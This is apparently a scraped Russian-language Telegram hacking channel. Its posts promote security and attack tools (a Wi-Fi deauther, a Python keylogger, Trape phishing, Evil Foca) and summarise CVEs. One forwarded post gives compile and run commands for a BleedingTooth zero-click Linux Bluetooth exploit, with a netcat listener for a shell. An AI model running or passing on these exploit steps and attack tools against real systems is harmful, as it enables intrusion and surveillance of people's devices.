Octosuite — это мощный и гибкий инструмент для сбора и анализа информации (OSINT) на платформе GitHub.
➖ Он позволяет автоматизировать поиск данных, выявлять уязвимости, отслеживать активность пользователей и репозиториев, а также собирать полезную информацию для анализа безопасности и разведки.
Основные возможности:
🎃 Вступить в закрытый канал / скрипто 🎃
👉 Подписаться 👈
#OSINT #Framework
Основные возможности:
Поиск пользователей, организаций и репозиториев по различным критериям.
👉 Подписаться 👈
#OSINT #Framework
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤1
Esp8266_deauther — это популярный и широко известный проект с открытым исходным кодом, использующий модуль ESP8266 Wi-Fi для выполнения атак деаутентификации (deauthentication attacks) на Wi-Fi сетях.
➖ С её помощью устройство может сканировать сети и точки доступа, производить атаки на сети и отключать от них клиентов.
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#WiFi #Attack #Deauth #Scanning
👉 Подписаться 👈
#WiFi #Attack #Deauth #Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤1
Что вы получаете приобретая подписку ?
Весь контент — для образовательных целей. Автор не несет ответственности за незаконное использование.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💔4
Бесплатная обучающая игра по SQL вдохновленная сериалом «Игра в кальмара». Всего 9 тематических уровней, в каждом из которых спрятана задача. Ошиблись — придется начинать заново. С каждым уровнем задания становятся всё сложнее, но везде даётся по 2 подсказки.
Если навыков не хватает или хотите выучить SQL с нуля, то есть 33 бесплатных урока, чтобы подтянуть знания.
👉 Подписаться 👈
#sql #game
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12💔3
Wave - терминал с открытым исходным кодом, который сочетает в себе традиционные возможности терминала с графическими возможностями, такими как предварительный просмотр файлов, веб-браузинг и помощь ИИ. Он работает на MacOS, Linux и Windows.
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#terminal
👉 Подписаться 👈
#terminal
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤1
👉 Подписаться 👈
#Keylogger #Python #OpenSource
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤1
Forwarded from Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.
BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)
Компиляция:
Запуск:
В другом терминале выполнить:
При успешной эксплуатации для запуска калькулятора выполнится:
Успешность: ~80% для целевой версии ядра.
Ограничения:
⏺ Bluetooth должен быть активен и доступен для подключения.
⏺ SELinux/AppArmor могут блокировать выполнение кода.
⏺ Современные ядра (после 5.15) не уязвимы.
Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)
Компиляция:
$ gcc -o exploit BleedingTooth.c -lbluetooth
Запуск:
$ sudo ./exploit MAC-адрес атакуемого устройства
В другом терминале выполнить:
$ nc -lvp 1337
При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator
Успешность: ~80% для целевой версии ядра.
Ограничения:
Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой. BleedingTooth: Удалённое выполнение…
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8
CVE-2025-49144 — это уязвимость с высоким уровнем риска, связанная с повышением локальных привилегий, обнаруженная в установщиках Notepad++ версии 8.8.1 и более ранних версий. Эта уязвимость возникает из-за неконтролируемого поведения пути поиска исполняемых файлов во время установки, что позволяет локальному злоумышленнику получить привилегии системного уровня, поместив вредоносные исполняемые файлы в тот же каталог, что и установщик.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#CVE #Windows #Linux
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#CVE #Windows #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10💔1
WebVM — это проект, реализующий виртуальную машину, способную запускать операционные системы и программы внутри веб-браузера.
⏺ Поддерживает множество архитектур и операционных систем, предоставляя удобный способ работать с ними онлайн.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#Web #OpenSource #Linux
Это позволяет создавать полностью автономные среды для тестирования, обучения и разработки без необходимости установки дополнительного ПО.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Web #OpenSource #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤1
CVE-2025-47812 — это серьёзная проблема, вызванная многочисленными недостатками в системе аутентификации пользователей и управления сеансами Wing FTP Server.
Эта уязвимость особенно опасна, поскольку Wing FTP Server часто работает с привилегиями root в Linux или привилегиями SYSTEM в Windows по умолчанию. Такая конфигурация по умолчанию даёт злоумышленникам максимальный контроль над взломанной системой в случае успешной эксплуатации.
Затронутые версии: уязвимы версии Wing FTP Server до 7.4.4.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#CVE
Эта уязвимость особенно опасна, поскольку Wing FTP Server часто работает с привилегиями root в Linux или привилегиями SYSTEM в Windows по умолчанию. Такая конфигурация по умолчанию даёт злоумышленникам максимальный контроль над взломанной системой в случае успешной эксплуатации.
Затронутые версии: уязвимы версии Wing FTP Server до 7.4.4.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤1💔1
Kingfisher — это инструмент, разработанный для анализа и валидации конфигураций MongoDB, помогающий выявлять потенциальные проблемы безопасности, производительности и соответствия лучшим практикам.
⏺ Он сканирует конфигурационные файлы MongoDB, выявляет отклонения от рекомендуемых настроек и генерирует отчеты с рекомендациями по улучшению конфигурации.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#MongoDB #DB
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#MongoDB #DB
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤1
Trape — это инструмент для отслеживания и профилирования людей в интернете, использующий методы социальной инженерии и OSINT.
⏺ Trape предназначен для тестирования на проникновение и оценки рисков, связанных с социальной инженерией.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#OSINT
Он позволяет создавать реалистичные фишинговые кампании, собирать информацию о пользователях, включая их IP-адреса, геолокацию, используемое устройство, браузер и другие данные.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤3
This media is not supported in your browser
VIEW IN TELEGRAM
Просматривайте веб-страницы, и браузер автоматически проверит их на наличие уязвимостей Reflected, Stored и DOM XSS в фоновом режиме. Также поддерживает POST запросы.
При нахождении уязвимости, отобразит ее в новом окне вместе с примером эксплуатации.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤3
🔥Evil Foca — инструмент для проверок различных сетевых атак в сетях IPv4 и IPv6.
Сканирует локальную сеть, идентифицируя устройства, маршрутизаторы и их сетевые интерфейсы, после чего можно совершать различные атаки на участников сети.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#scan
Сканирует локальную сеть, идентифицируя устройства, маршрутизаторы и их сетевые интерфейсы, после чего можно совершать различные атаки на участников сети.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#scan
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
⚙ Nautilus — официальный файловый менеджер для рабочей среды GNOME. В названии присутствует игра слов, связанная с изображением раковины моллюска наутилуса для представления оболочки операционной системы (англ. shell — это и раковина, и оболочка ОС).
Nautilus заменил Midnight Commander в GNOME 1.4 и стал файловым менеджером по умолчанию начиная с версии 2.0.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#terminal
Nautilus заменил Midnight Commander в GNOME 1.4 и стал файловым менеджером по умолчанию начиная с версии 2.0.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#terminal
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤1
Raspirus — это сканер вредоносного программного обеспечения, разработанный с акцентом на простоту использования и минимальное потребление ресурсов, работающий на основе настраиваемых правил.
➖ Он позволяет обнаруживать вредоносное ПО на различных платформах, используя базу правил, определяющих известные вредоносные программы и подозрительное поведение.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#Scan #Malware
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Scan #Malware
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9